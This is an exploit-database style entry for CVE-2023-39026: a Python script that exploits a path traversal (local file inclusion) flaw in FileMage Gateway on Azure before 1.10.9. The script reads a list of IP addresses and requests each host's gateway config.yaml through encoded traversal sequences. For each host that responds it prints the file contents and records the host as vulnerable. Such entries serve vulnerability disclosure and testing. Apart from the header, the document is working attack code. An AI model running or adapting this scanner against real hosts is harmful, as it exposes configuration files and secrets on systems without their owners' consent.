# Exploit Title: FileMage Gateway 1.10.9 - Local File Inclusion # Date: 8/22/2023 # Exploit Author: Bryce "Raindayzz" Harty # Vendor Homepage: https://www.filemage.io/ # Version: Azure Versions < 1.10.9 # Tested on: All Azure deployments < 1.10.9 # CVE : CVE-2023-39026 # Technical Blog - https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html # Patch from vendor - https://www.filemage.io/docs/updates.html import requests import warnings warnings.filterwarnings("ignore") def worker(url): response = requests.get(url, verify=False, timeout=.5) return response def main(): listIP = [] file_path = input("Enter the path to the file containing the IP addresses: ") with open(file_path, 'r') as file: ip_list = file.read().splitlines() searchString = "tls" for ip in ip_list: url = f"https://{ip}" + "/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cprogramdata%5cfilemage%5cgateway%5cconfig.yaml" try: response = worker(url) #print(response.text) if searchString in response.text: print("Vulnerable IP: " + ip) print(response.text) listIP.append(ip) except requests.exceptions.RequestException as e: print(f"Error occurred for {ip}: {str(e)}") for x in listIP: print(x) if __name__ == '__main__': main()